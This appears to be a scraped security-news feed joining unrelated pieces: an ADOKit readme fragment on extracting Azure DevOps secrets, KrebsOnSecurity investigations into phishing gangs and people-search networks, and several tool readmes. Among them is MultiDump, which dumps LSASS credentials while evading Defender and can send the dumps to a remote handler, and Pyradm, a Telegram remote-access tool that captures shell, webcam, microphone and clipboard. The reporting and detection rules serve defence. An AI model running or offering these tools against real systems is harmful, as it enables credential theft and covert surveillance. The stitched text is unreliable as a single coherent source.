    Project: maraudersmap
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/10/2023 10:28:37 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Build Secret Name | Build Secret Value
    -----------------------------------------------------
    anotherSecretPass | [HIDDEN]
    secretpass | [HIDDEN]

    4/10/23 14:28:38 Finished execution of getpipelinesecrets

    Get Service Connections

    Use Case

    List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.

    Syntax

    Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

    ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

    ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

    Example Output

    C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getserviceconnections
    Auth Type: Cookie
    Project: maraudersmap
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/11/2023 8:34:16 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Connection Name | Connection Type | ID
    --------------------------------------------------------------------------------------------------------------------------------------------------
    Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
    Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
    Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
    Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

    4/11/23 12:34:16 Finished execution of getserviceconnections

    Detection

    Below are static signatures for the specific usage of this tool in its default state:

    • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
    • See ADOKit Yara Rule in this repo.
    • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
    • See ADOKit Snort Rule in this repo.
    • Microsoft Sentinel Rules
    • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
    • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

    For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

    Roadmap

    • Support for Azure DevOps Server

    References

    • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
    • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


    ‘The Manipulaters’ Improve Phishing, Still Fail at Opsec

    Roughly nine years ago, KrebsOnSecurity profiled a Pakistan-based cybercrime group called “The Manipulaters,” a sprawling web hosting network of phishing and spam delivery platforms. In January 2024, The Manipulaters pleaded with this author to unpublish previous stories about their work, claiming the group had turned over a new leaf and gone legitimate. But new research suggests that while they have improved the quality of their products and services, these nitwits still fail spectacularly at hiding their illegal activities.

    In May 2015, KrebsOnSecurity published a brief writeup about the brazen Manipulaters team, noting that they openly operated hundreds of web sites selling tools designed to trick people into giving up usernames and passwords, or deploying malicious software on their PCs.

    Manipulaters advertisement for “Office 365 Private Page with Antibot” phishing kit sold on the domain heartsender,com. “Antibot” refers to functionality that attempts to evade automated detection techniques, keeping a phish deployed as long as possible. Image: DomainTools.

    The core brand of The Manipulaters has long been a shared cybercriminal identity named “Saim Raza,” who for the past decade has peddled a popular spamming and phishing service variously called “Fudtools,” “Fudpage,” “Fudsender,” “FudCo,” etc. The term “FUD” in those names stands for “Fully Un-Detectable,” and it refers to cybercrime resources that will evade detection by security tools like antivirus software or anti-spam appliances.

    A September 2021 story here checked in on The Manipulaters, and found that Saim Raza and company were prospering under their FudCo brands, which they secretly managed from a front company called We Code Solutions.

    That piece worked backwards from all of the known Saim Raza email addresses to identify Facebook profiles for multiple We Code Solutions employees, many of whom could be seen celebrating company anniversaries gathered around a giant cake with the words “FudCo” painted in icing.

    Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions. The first was in the weeks following the Sept. 2021 piece, when one of Saim Raza’s known email addresses — bluebtcus@gmail.com — pleaded to have the story taken down.

    “Hello, we already leave that fud etc before year,” the Saim Raza identity wrote. “Why you post us? Why you destroy our lifes? We never harm anyone. Please remove it.”

    Not wishing to be manipulated by a phishing gang, KrebsOnSecurity ignored those entreaties. But on Jan. 14, 2024, KrebsOnSecurity heard from the same bluebtcus@gmail.com address, apropos of nothing.

    “Please remove this article,” Sam Raza wrote, linking to the 2021 profile. “Please already my police register case on me. I already leave everything.”

    Asked to elaborate on the police investigation, Saim Raza said they were freshly released from jail.

    “I was there many days,” the reply explained. “Now back after bail. Now I want to start my new work.”

    Exactly what that “new work” might entail, Saim Raza wouldn’t say. But a new report from researchers at DomainTools.com finds that several computers associated with The Manipulaters have been massively hacked by malicious data- and password-snarfing malware for quite some time.

    DomainTools says the malware infections on Manipulaters PCs exposed “vast swaths of account-related data along with an outline of the group’s membership, operations, and position in the broader underground economy.”

    “Curiously, the large subset of identified Manipulaters customers appear to be compromised by the same stealer malware,” DomainTools wrote. “All observed customer malware infections began after the initial compromise of Manipulaters PCs, which raises a number of questions regarding the origin of those infections.”

    A number of questions, indeed. The core Manipulaters product these days is a spam delivery service called HeartSender, whose homepage openly advertises phishing kits targeting users of various Internet companies, including Microsoft 365, Yahoo, AOL, Intuit, iCloud and ID.me, to name a few.

    A screenshot of the homepage of HeartSender 4 displays an IP address tied to fudtoolshop@gmail.com. Image: DomainTools.

    HeartSender customers can interact with the subscription service via the website, but the product appears to be far more effective and user-friendly if one downloads HeartSender as a Windows executable program. Whether that HeartSender program was somehow compromised and used to infect the service’s customers is unknown.

    However, DomainTools also found the hosted version of HeartSender service leaks an extraordinary amount of user information that probably is not intended to be publicly accessible. Apparently, the HeartSender web interface has several webpages that are accessible to unauthenticated users, exposing customer credentials along with support requests to HeartSender developers.

    “Ironically, the Manipulaters may create more short-term risk to their own customers than law enforcement,” DomainTools wrote. “The data table “User Feedbacks” (sic) exposes what appear to be customer authentication tokens, user identifiers, and even a customer support request that exposes root-level SMTP credentials–all visible by an unauthenticated user on a Manipulaters-controlled domain. Given the risk for abuse, this domain will not be published.”

    This is hardly the first time The Manipulaters have shot themselves in the foot. In 2019, The Manipulaters failed to renew their core domain name — manipulaters[.]com — the same one tied to so many of the company’s past and current business operations. That domain was quickly scooped up by Scylla Intel, a cyber intelligence firm that focuses on connecting cybercriminals to their real-life identities.

    Currently, The Manipulaters seem focused on building out and supporting HeartSender, which specializes in spam and email-to-SMS spamming services.

    “The Manipulaters’ newfound interest in email-to-SMS spam could be in response to the massive increase in smishing activity impersonating the USPS,” DomainTools wrote. “Proofs posted on HeartSender’s Telegram channel contain numerous references to postal service impersonation, including proving delivery of USPS-themed phishing lures and the sale of a USPS phishing kit.”

    Reached via email, the Saim Raza identity declined to respond to questions about the DomainTools findings.

    “First [of] all we never work on virus or compromised computer etc,” Raza replied. “If you want to write like that fake go ahead. Second I leave country already. If someone bind anything with exe file and spread on internet its not my fault.”

    Asked why they left Pakistan, Saim Raza said the authorities there just wanted to shake them down.

    “After your article our police put FIR on my [identity],” Saim Raza explained. “FIR” in this case stands for “First Information Report,” which is the initial complaint in the criminal justice system of Pakistan.

    “They only get money from me nothing else,” Saim Raza continued. “Now some officers ask for money again again. Brother, there is no good law in Pakistan just they need money.”

    Saim Raza has a history of being slippery with the truth, so who knows whether The Manipulaters and/or its leaders have in fact fled Pakistan (it may be more of an extended vacation abroad). With any luck, these guys will soon venture into a more Western-friendly, “good law” nation and receive a warm welcome by the local authorities.

    Noia - Simple Mobile Applications Sandbox File Browser Tool

    By: Zion3R


    Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

    Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


    Installation & Usage

    npm install -g noia
    noia

    Features

    • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

    • View custom binary files. Directly preview SQLite databases, images, and more.

    • Search application by name.

    • Search files and directories by name.

    • Navigate to a custom directory using the ctrl+g shortcut.

    • Download the application files and directories for further analysis.

    • Basic iOS support

    and more


    Setup

    Desktop requirements:

    • node.js LTS and npm
    • Any decent modern desktop browser

    Noia is available on npm, so just type the following command to install it and run it:

    npm install -g noia
    noia

    Device setup:

    Noia is powered by frida.re, thus requires Frida to run.

    Rooted Device

    See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

    Non-rooted Device

    • https://koz.io/using-frida-on-android-without-root/
    • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
    • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

    Security Warning

    This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

    LICENCE

    MIT



    Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

    By: Zion3R

    About

    skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


    What is Planespotting & Aircraft OSINT?

    Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject — in this case planes!

    Aircraft Information

    • Tail Number 🛫
    • Aircraft Type ⚙️
    • ICAO24 Designation 🔎
    • Manufacturer Details 🛠
    • Flight Logs 📄
    • Aircraft Owner ✈️
    • Model 🛩
    • Much more!

    Usage

    To run skytrack on your machine, follow the steps below:

    $ git clone https://github.com/ANG13T/skytrack
    $ cd skytrack
    $ pip install -r requirements.txt
    $ python skytrack.py

    skytrack works best for Python version 3.

    Preview

    Features

    skytrack features three main functions for aircraft information

    gathering and display options. They include the following:

    Aircraft Reconnaissance & OSINT

    skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

    PDF Aircraft Information Report

    skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

    Tail Number to ICAO Converter

    There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

    reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

    Further Explanation

    ICAO and Tail Numbers follow a mapping system like the following:

    ICAO address N-Number (Tail Number)

    a00001 N1

    a00002 N1A

    a00003 N1AA

    You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

    :warning: Converter only works for USA-registered aircraft

    Data Sources & APIs Used

    ICAO Aircraft Type Designators Listings

    FlightAware

    Wikipedia

    Aviation Safety Website

    Jet Photos Website

    OpenSky API

    Aviation Weather METAR

    Airport Codes Dataset

    Contributing

    skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

    Upcoming

    • Obtain Latest Flown Airports
    • Obtain Airport Information
    • Obtain ATC Frequency Information

    Support

    If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

    To check out my other works, visit my GitHub profile.



    The Not-so-True People-Search Network from China

    It’s not unusual for the data brokers behind people-search websites to use pseudonyms in their day-to-day lives (you would, too). Some of these personal data purveyors even try to reinvent their online identities in a bid to hide their conflicts of interest. But it’s not every day you run across a US-focused people-search network based in China whose principal owners all appear to be completely fabricated identities.

    Responding to a reader inquiry concerning the trustworthiness of a site called TruePeopleSearch[.]net, KrebsOnSecurity began poking around. The site offers to sell reports containing photos, police records, background checks, civil judgments, contact information “and much more!” According to LinkedIn and numerous profiles on websites that accept paid article submissions, the founder of TruePeopleSearch is Marilyn Gaskell from Phoenix, Ariz.

    The saucy yet studious LinkedIn profile for Marilyn Gaskell.

    Ms. Gaskell has been quoted in multiple “articles” about random subjects, such as this article at HRDailyAdvisor about the pros and cons of joining a company-led fantasy football team.

    “Marilyn Gaskell, founder of TruePeopleSearch, agrees that not everyone in the office is likely to be a football fan and might feel intimidated by joining a company league or left out if they don’t join; however, her company looked for ways to make the activity more inclusive,” this paid story notes.

    Also quoted in this article is Sally Stevens, who is cited as HR Manager at FastPeopleSearch[.]io.

    Sally Stevens, the phantom HR Manager for FastPeopleSearch.

    “Fantasy football provides one way for employees to set aside work matters for some time and have fun,” Stevens contributed. “Employees can set a special league for themselves and regularly check and compare their scores against one another.”

    Imagine that: Two different people-search companies mentioned in the same story about fantasy football. What are the odds?

    Both TruePeopleSearch and FastPeopleSearch allow users to search for reports by first and last name, but proceeding to order a report prompts the visitor to purchase the file from one of several established people-finder services, including BeenVerified, Intelius, and Spokeo.

    DomainTools.com shows that both TruePeopleSearch and FastPeopleSearch appeared around 2020 and were registered through Alibaba Cloud, in Beijing, China. No other information is available about these domains in their registration records, although both domains appear to use email servers based in China.

    Sally Stevens’ LinkedIn profile photo is identical to a stock image titled “beautiful girl” from Adobe.com. Ms. Stevens is also quoted in a paid blog post at ecogreenequipment.com, as is Alina Clark, co-founder and marketing director of CocoDoc, an online service for editing and managing PDF documents.

    The profile photo for Alina Clark is a stock photo appearing on more than 100 websites.

    Scouring multiple image search sites reveals Ms. Clark’s profile photo on LinkedIn is another stock image that is currently on more than 100 different websites, including Adobe.com. Cocodoc[.]com was registered in June 2020 via Alibaba Cloud Beijing in China.

    The same Alina Clark and photo materialized in a paid article at the website Ceoblognation, which in 2021 included her at #11 in a piece called “30 Entrepreneurs Describe The Big Hairy Audacious Goals (BHAGs) for Their Business.” It’s also worth noting that Ms. Clark is currently listed as a “former Forbes Council member” at the media outlet Forbes.com.

    Entrepreneur #6 is Stephen Curry, who is quoted as CEO of CocoSign[.]com, a website that claims to offer an “easier, quicker, safer eSignature solution for small and medium-sized businesses.” Incidentally, the same photo for Stephen Curry #6 is also used in this “article” for #22 Jake Smith, who is named as the owner of a different company.

    Stephen Curry, aka Jake Smith, aka no such person.

    Mr. Curry’s LinkedIn profile shows a young man seated at a table in front of a laptop, but an online image search shows this is another stock photo. Cocosign[.]com was registered in June 2020 via Alibaba Cloud Beijing. No ownership details are available in the domain registration records.

    Listed at #13 in that 30 Entrepreneurs article is Eden Cheng, who is cited as co-founder of PeopleFinderFree[.]com. KrebsOnSecurity could not find a LinkedIn profile for Ms. Cheng, but a search on her profile image from that Entrepreneurs article shows the same photo for sale at Shutterstock and other stock photo sites.

    DomainTools says PeopleFinderFree was registered through Alibaba Cloud, Beijing. Attempts to purchase reports through PeopleFinderFree produce a notice saying the full report is only available via Spokeo.com.

    Lynda Fairly is Entrepreneur #24, and she is quoted as co-founder of Numlooker[.]com, a domain registered in April 2021 through Alibaba in China. Searches for people on Numlooker forward visitors to Spokeo.

    The photo next to Ms. Fairly’s quote in Entrepreneurs matches that of a LinkedIn profile for Lynda Fairly. But a search on that photo shows this same portrait has been used by many other identities and names, including a woman from the United Kingdom who’s a cancer survivor and mother of five; a licensed marriage and family therapist in Canada; a software security engineer at Quora; a journalist on Twitter/X; and a marketing expert in Canada.

    Cocofinder[.]com is a people-search service that launched in Sept. 2019, through Alibaba in China. Cocofinder lists its market officer as Harriet Chan, but Ms. Chan’s LinkedIn profile is just as sparse on work history as the other people-search owners mentioned already. An image search online shows that outside of LinkedIn, the profile photo for Ms. Chan has only ever appeared in articles at pay-to-play media sites, like this one from outbackteambuilding.com.

    Perhaps because Cocodoc and Cocosign both sell software services, they are actually tied to a physical presence in the real world — in Singapore (15 Scotts Rd. #03-12 15, Singapore). But it’s difficult to discern much from this address alone.

    Who’s behind all this people-search chicanery? A January 2024 review of various people-search services at the website techjury.com states that Cocofinder is a wholly-owned subsidiary of a Chinese company called Shenzhen Duiyun Technology Co.

    “Though it only finds results from the United States, users can choose between four main search methods,” Techjury explains. Those include people search, phone, address and email lookup. This claim is supported by a Reddit post from three years ago, wherein the Reddit user “ProtectionAdvanced” named the same Chinese company.

    Is Shenzhen Duiyun Technology Co. responsible for all these phony profiles? How many more fake companies and profiles are connected to this scheme? KrebsOnSecurity found other examples that didn’t appear directly tied to other fake executives listed here, but which nevertheless are registered through Alibaba and seek to drive traffic to Spokeo and other data brokers. For example, there’s the winsome Daniela Sawyer, founder of FindPeopleFast[.]net, whose profile is flogged in paid stories at entrepreneur.org.

    Google currently turns up nothing else for in a search for Shenzhen Duiyun Technology Co. Please feel free to sound off in the comments if you have any more information about this entity, such as how to contact it. Or reach out directly at krebsonsecurity @ gmail.com.

    A mind map highlighting the key points of research in this story. Click to enlarge. Image: KrebsOnSecurity.com

    ANALYSIS

    It appears the purpose of this network is to conceal the location of people in China who are seeking to generate affiliate commissions when someone visits one of their sites and purchases a people-search report at Spokeo, for example. And it is clear that Spokeo and others have created incentives wherein anyone can effectively white-label their reports, and thereby make money brokering access to peoples’ personal information.

    Spokeo’s Wikipedia page says the company was founded in 2006 by four graduates from Stanford University. Spokeo co-founder and current CEO Harrison Tang has not yet responded to requests for comment.

    Intelius is owned by San Diego based PeopleConnect Inc., which also owns Classmates.com, USSearch, TruthFinder and Instant Checkmate. PeopleConnect Inc. in turn is owned by H.I.G. Capital, a $60 billion private equity firm. Requests for comment were sent to H.I.G. Capital. This story will be updated if they respond.

    BeenVerified is owned by a New York City based holding company called The Lifetime Value Co., a marketing and advertising firm whose brands include PeopleLooker, NeighborWho, Ownerly, PeopleSmart, NumberGuru, and Bumper, a car history site.

    Ross Cohen, chief operating officer at The Lifetime Value Co., said it’s likely the network of suspicious people-finder sites was set up by an affiliate. Cohen said Lifetime Value would investigate to determine if this particular affiliate was driving them any sign-ups.

    All of the above people-search services operate similarly. When you find the person you’re looking for, you are put through a lengthy (often 10-20 minute) series of splash screens that require you to agree that these reports won’t be used for employment screening or in evaluating new tenant applications. Still more prompts ask if you are okay with seeing “potentially shocking” details about the subject of the report, including arrest histories and photos.

    Only at the end of this process does the site disclose that viewing the report in question requires signing up for a monthly subscription, which is typically priced around $35. Exactly how and from where these major people-search websites are getting their consumer data — and customers — will be the subject of further reporting here.

    The main reason these various people-search sites require you to affirm that you won’t use their reports for hiring or vetting potential tenants is that selling reports for those purposes would classify these firms as consumer reporting agencies (CRAs) and expose them to regulations under the Fair Credit Reporting Act (FCRA).

    These data brokers do not want to be treated as CRAs, and for this reason their people search reports typically don’t include detailed credit histories, financial information, or full Social Security Numbers (Radaris reports include the first six digits of one’s SSN).

    But in September 2023, the U.S. Federal Trade Commission found that TruthFinder and Instant Checkmate were trying to have it both ways. The FTC levied a $5.8 million penalty against the companies for allegedly acting as CRAs because they assembled and compiled information on consumers into background reports that were marketed and sold for employment and tenant screening purposes.

    The FTC also found TruthFinder and Instant Checkmate deceived users about background report accuracy. The FTC alleges these companies made millions from their monthly subscriptions using push notifications and marketing emails that claimed that the subject of a background report had a criminal or arrest record, when the record was merely a traffic ticket.

    The FTC said both companies deceived customers by providing “Remove” and “Flag as Inaccurate” buttons that did not work as advertised. Rather, the “Remove” button removed the disputed information only from the report as displayed to that customer; however, the same item of information remained visible to other customers who searched for the same person.

    The FTC also said that when a customer flagged an item in the background report as inaccurate, the companies never took any steps to investigate those claims, to modify the reports, or to flag to other customers that the information had been disputed.

    There are a growing number of online reputation management companies that offer to help customers remove their personal information from people-search sites and data broker databases. There are, no doubt, plenty of honest and well-meaning companies operating in this space, but it has been my experience that a great many people involved in that industry have a background in marketing or advertising — not privacy.

    Also, some so-called data privacy companies may be wolves in sheep’s clothing. On March 14, KrebsOnSecurity published an abundance of evidence indicating that the CEO and founder of the data privacy company OneRep.com was responsible for launching dozens of people-search services over the years.

    Finally, some of the more popular people-search websites are notorious for ignoring requests from consumers seeking to remove their information, regardless of which reputation or removal service you use. Some force you to create an account and provide more information before you can remove your data. Even then, the information you worked hard to remove may simply reappear a few months later.

    This aptly describes countless complaints lodged against the data broker and people search giant Radaris. On March 8, KrebsOnSecurity profiled the co-founders of Radaris, two Russian brothers in Massachusetts who also operate multiple Russian-language dating services and affiliate programs.

    The truth is that these people-search companies will continue to thrive unless and until Congress begins to realize it’s time for some consumer privacy and data protection laws that are relevant to life in the 21st century. Duke University adjunct professor Justin Sherman says virtually all state privacy laws exempt records that might be considered “public” or “government” documents, including voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, bankruptcy filings, and more.

    “Consumer privacy laws in California, Colorado, Connecticut, Delaware, Indiana, Iowa, Montana, Oregon, Tennessee, Texas, Utah, and Virginia all contain highly similar or completely identical carve-outs for ‘publicly available information’ or government records,” Sherman said.

    MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

    By: Zion3R


    MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

    Blog post: https://xre0us.io/posts/multidump


    MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

    Usage

        __  __       _ _   _ _____
    | \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
    | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
    | | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
    |_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
    |_|

    Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

    -p Path to save procdump.exe, use full path. Default to temp directory
    -l Path to save encrypted dump file, use full path. Default to current directory
    -r Set ip:port to connect to a remote handler
    --procdump Writes procdump to disk and use it to dump LSASS
    --nodump Disable LSASS dumping
    --reg Dump SAM, SECURITY and SYSTEM hives
    --delay Increase interval between connections to for slower network speeds
    -v Enable v erbose mode

    MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
    Examples:
    MultiDump.exe -l C:\Users\Public\lsass.dmp -v
    MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
    usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

    Handler for RemoteProcDump

    options:
    -h, --help show this help message and exit
    -r REMOTE, --remote REMOTE
    Port to receive remote dump file
    -l LOCAL, --local LOCAL
    Local dump file, key needed to decrypt
    --sam SAM Local SAM save, key needed to decrypt
    --security SECURITY Local SECURITY save, key needed to decrypt
    --system SYSTEM Local SYSTEM save, key needed to decrypt
    -k KEY, --key KEY Key to decrypt local file
    --override-ip OVERRIDE_IP
    Manually specify the IP address for key generation in remote mode, for proxied connection

    As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

    The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

    By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

    MultiDump.exe
    ...
    [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
    [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
    [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
    ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

    If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

    In remote mode, MultiDump connects to the handler's listener.

    ./ProcDumpHandler.py -r 9001
    [i] Listening on port 9001 for encrypted key...
    MultiDump.exe -r 10.0.0.1:9001

    The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

    An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

    Building MultiDump

    Open in Visual Studio, build in Release mode.

    Customising MultiDump

    It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

    Self deletion can be toggled by uncommenting the following line in Common.h:

    #define SELF_DELETION

    To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

    //#define DEBUG

    MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/

    Credits



    Dorkish - Chrome Extension Tool For OSINT & Recon

    By: Zion3R


    During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
    Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.


    Installation And Setup

    1- Clone the repository

    git clone https://github.com/yousseflahouifi/dorkish.git

    2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
    3- click on Load unpacked extension button and select the dorkish folder.

    Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/

    Features

    Google dorking

    • Builder with keywords to filter your google search results.
    • Prebuilt dorks for Bug bounty programs.
    • Prebuilt dorks used during the reconnaissance phase in bug bounty.
    • Prebuilt dorks for exposed files and directories
    • Prebuilt dorks for logins and sign up portals
    • Prebuilt dorks for cyber secruity jobs

    Shodan dorking

    • Builder with filter keywords used in shodan.
    • Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.

    Usage

    Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

    TODO

    • Add more useful dorks and catogories
    • Fix some bugs
    • Add a search bar to search through the results
    • Might add some LLM models to build dorks

    Notes

    I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

    Warning

    • I am not responsible for any damage caused by using the tool


    Pyradm - Python Remote Administration Tool Via Telegram

    By: Zion3R


    Remote administration crossplatfrom tool via telegram\ Coded with ❤️ python3 + aiogram3\ https://t.me/pt_soft

    v0.3

    • [X] Screenshot from target
    • [X] Crossplatform
    • [X] Upload/Download
    • [X] Fully compatible shell
    • [X] Process list
    • [X] Webcam (video record or screenshot)
    • [X] Geolocation
    • [X] Filemanager
    • [X] Microphone
    • [X] Clipboard (text, image)

    Functional

    /start - start pyradm
    /help - help
    /shell - shell commands
    /sc - screenshot
    /download - download (abs. path)
    /info - system info
    /ip - public ip address and geolocation
    /ps - process list
    /webcam 5 - record video (secs)
    /webcam - screenshot from camera
    /fm - filemanager
    /fm /home or /fm C:\
    /mic 10 - record audio from mic
    /clip - get clipboard data
    Press button to download file
    Send any file as file for upload to target

    Install

    • git clone https://github.com/akhomlyuk/pyradm.git
    • cd pyradm
    • pip3 install -r requirements.txt
    • Put bot token to cfg.py, ask @Bothfather
    • python3 main.py

    Compile

    • Put bot token to cfg.py
    • pip install nuitka
    • nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py

    Screens



    CEO of Data Privacy Company Onerep.com Founded Dozens of People-Search Firms

    The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.

    Onerep’s “Protect” service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.

    A testimonial on onerep.com.

    Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.

    But a review of Onerep’s domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelest’s profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.

    A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.

    Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.com’s website disavows any relationship to Nuwber.com, stating quite clearly, “Please note that OneRep is not associated with Nuwber.com.”

